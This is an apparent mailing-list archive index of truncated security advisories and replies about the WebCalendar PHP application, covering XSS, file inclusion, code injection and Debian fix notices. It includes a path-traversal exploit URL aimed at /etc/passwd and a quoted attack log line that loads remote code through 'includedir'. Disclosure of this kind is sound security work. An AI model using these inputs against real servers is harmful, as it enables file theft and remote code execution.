Re: WebCalendar

2005-12-03 Thread Louis Wang
Hi, Dan: As some vulnerabilities have been fixed by the vendor, I have updated this vulnerability advisory. Sorry for any trouble I have caused you. The following is the updated advisory: WebCalendar CRLF Injection Vulnerability I. BACKGROUND

(SRPRE00004) WebCalendar 0.9.26

2001-04-23 Thread Asher Glynn
Secure Reality Pty Ltd. Security Pre-Advisory #4 (SRPRE4) http://www.securereality.com.au [Title] Remote command execution vulnerabilities in WebCalendar [Released] 23/4/2001 This is a pre

WebCalendar Include File

2003-07-21 Thread noconflic
Webcalendar 0.9.41 and below. http://webcalendar.sourceforge.net/ Since this appears to be public info now. Problem: http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588 Exploit: http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/pa

WebCalendar Multiple Vulnerabilities

2005-11-28 Thread ascii
WebCalendar Multiple Vulnerabilities Name Multiple Vulnerabilities in WebCalendar Systems Affected WebCalendar (verified on 1.0.1) Severity Medium Risk Vendor www.k5n.us/webcalendar.php?topic=About Advisory http://www.ush.it/2005/11/28/webcalendar

WebCalendar Multiple Vulnerabilities.

2005-12-01 Thread lwang
WebCalendar Multiple Vulnerabilities. Author: lwang (lwang at lwang.org) Publish Date: 2005-12-1 Description: WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of purposes. In WebCalendar 0.1.0, activity_log.php and edit_report_handler.php

Re: WebCalendar Include File

2003-07-25 Thread Emmanuel Lacour
On Sun, Jul 20, 2003 at 08:20:15PM -0500, noconflic wrote: > > > Webcalendar 0.9.41 and below. > http://webcalendar.sourceforge.net/ > > Since this appears to be public info now. > > Problem: > http://sourceforge.net/forum/forum.php?thread_id=901234&forum_

Re: WebCalendar Multiple Vulnerabilities

2005-11-30 Thread ascii
Paul Laudanski wrote: I too tried contacting the vendor but received no response. Your timing of vendor notice and vul'n release are fast unfortunately. Taking a look, simple functions in PHP can be called upon to fix those issues. thanks Paul for the cooperation : ) i'm sorry i hadn't upda

Re: WebCalendar Multiple Vulnerabilities

2005-12-01 Thread craig
Fix has already been posted: https://sourceforge.net/tracker/index.php?func=detail&aid=1369439&group_id=3870&atid=303870

Re: WebCalendar Multiple Vulnerabilities

2005-12-02 Thread Paul Laudanski
On Mon, 28 Nov 2005, ascii wrote: > Name Multiple Vulnerabilities in WebCalendar > Systems Affected WebCalendar (verified on 1.0.1) > Severity Medium Risk > Vendor www.k5n.us/webcalendar.php?topic=About > Advisory >http://www.ush.

Webcalendar 1.2.4 'location' XSS

2012-01-20 Thread tom
# Exploit Title: Webcalendar 1.2.4 'location' XSS # Date: 01/11/12 # Author: G13 # Software Link: https://sourceforge.net/projects/webcalendar/?source=directory # Version: 1.2.5 # Category: webapps (php) # # Vulnerability # There is no sanitation on the input of the locatio

WebCalendar User Account Enumeration Weakness

2006-05-05 Thread David Maciejak
WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. See project homepage for details: http://www.k5n.us/webcalendar.php Description: The problem is that

WebCalendar v1.2.7 PHP Code Injection

2016-07-04 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt [+] ISR: ApparitionSec Vendor: www.k5n.us/webcalendar.php Product

WebCalendar v1.2.7 CSRF Protection Bypass

2016-07-04 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: www.k5n.us/webcalendar.php Product

WebCalendar <= 1.2.4 Two Security Vulnerabilities

2012-04-23 Thread n0b0d13s
- WebCalendar <= 1.2.4 Two Security Vulnerabilities - author..: Egidio Romano aka EgiX mail: n0b0d13s[at]gmail[dot]com software link...: https://sourceforge.net/proje

HTB22930: Multiple XSS in WebCalendar

2011-04-12 Thread advisory
Vulnerability ID: HTB22930 Reference: http://www.htbridge.ch/advisory/xss_in_webcalendar.html Product: WebCalendar Vendor: k5n.us ( http://www.k5n.us/ ) Vulnerable Version: 1.2.3 Vendor Notification: 29 March 2011 Vulnerability Type: XSS (Cross Site Scripting) Risk level: Medium Credit: High

Re: WebCalendar User Account Enumeration Weakness

2006-05-05 Thread David Maciejak
According to WebCalendar lead developer, this will be corrected in upcoming developer release v1.1. david On 5/5/06, David Maciejak <[EMAIL PROTECTED]> wrote: WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for gro

WebCalendar-1.0.3 reading of any files

2006-05-30 Thread socsam
Version:WebCalendar-1.0.3 Type: Reading of any files Description: - includes/config.php: line 64 if ( ! empty ( $includedir ) ) $fd = @fopen ( "$includedir/settings.php", "rb", true ); .. while ( ! feof ( $fd ) ) {

WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities

2006-12-19 Thread 7all7
WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities |=---=[ WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities ]---=| |=-=| |=---=[ 7all<7all7_a

Full path disclosure in Webcalendar 1.1.0-CVS

2006-03-29 Thread crasher
Full path disclosure in webcalendar Author : Rusydi Hasan M a.k.a: cR45H3R Location : Indonesia, Cilacap Date : March,28th 2006 Version : 1.1.0-CVS --- (software description) WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of

Re: WebCalendar-1.0.3 reading of any files

2006-06-07 Thread craig
This issue has been fixed in the SourceForge CVS repository (REL_1_0_0) and is included in the 1.0.4 release (released on 7 Jun 2006).

Re: WebCalendar-1.0.3 reading of any files

2006-10-02 Thread webcalendar
After finding these entries in the logfile and finding a cmd.html-file in this directory, I was disconnected because I was working as a phishing-site. "POST /WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt? HTTP/1.1" 200 7315 In other words, the at

Multiple Cross-Site Scripting vulnerabilities in WebCalendar

2011-07-04 Thread sschurtz
Advisory: Multiple Cross-Site Scripting vulnerabilities in WebCalendar Advisory ID:SSCHADV2011-008 Author: Stefan Schurtz Affected Software: Version 1.2.3 and probably prior versions Vendor URL: http://www.k5n.us/webcalendar.php Vendor Status: informed

Re: Multiple Cross-Site Scripting vulnerabilities in WebCalendar

2011-07-06 Thread Henri Salo
On Mon, Jul 04, 2011 at 06:46:09AM +, sschu...@t-online.de wrote: > Advisory: Multiple Cross-Site Scripting vulnerabilities in > WebCalendar > Advisory ID:SSCHADV2011-008 > Author: Stefan Schurtz > Affected Software: Version 1.2.3 and probably

WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

2007-03-15 Thread drackanz
WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

Re: Re: Multiple Cross-Site Scripting vulnerabilities in WebCalendar

2011-07-07 Thread sschurtz
No response from vendor so far! And no I didn't request a CVE-identifier, so I'd really appreciate your help :) Best regards, Stefan

[SECURITY] [DSA 1002-1] New webcalendar packages fix several vulnerabilities

2006-03-15 Thread Martin Schulze
http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : several Problem type : remote Debian-specific: no CVE IDs: CVE-2005-3949 CVE-2005-3961 CVE-2005-3982 CERT advisory

Re: WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

2007-03-20 Thread craig
This is an outdated version of WebCalendar (0.9.45). This issue and other related issues are fixed in the 1.0.5 version of WebCalendar.

[SECURITY] [DSA 1056-1] New webcalendar packages fix information leak

2006-05-15 Thread Martin Schulze
http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : verbose error message Problem type : remote Debian-specific: no CVE ID : CVE-2006-2247 Debian Bug : 366927 David

[SECURITY] [DSA 1267-1] New webcalendar packages fix remote file inclusion

2007-03-16 Thread Moritz Muehlenhoff
http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-1343 It was discovered that

[SECURITY] [DSA 1279-1] New webcalendar packages fix cross-site scripting

2007-04-23 Thread Moritz Muehlenhoff
http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-6669 It was discovered that

[SECURITY] [DSA 1096-1] New webcalendar packages fix arbitrary code execution

2006-06-13 Thread Martin Schulze
http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : uninitialised variable Problem type : remote Debian-specific: no CVE ID : CVE-2006-2762 A vulnerability has been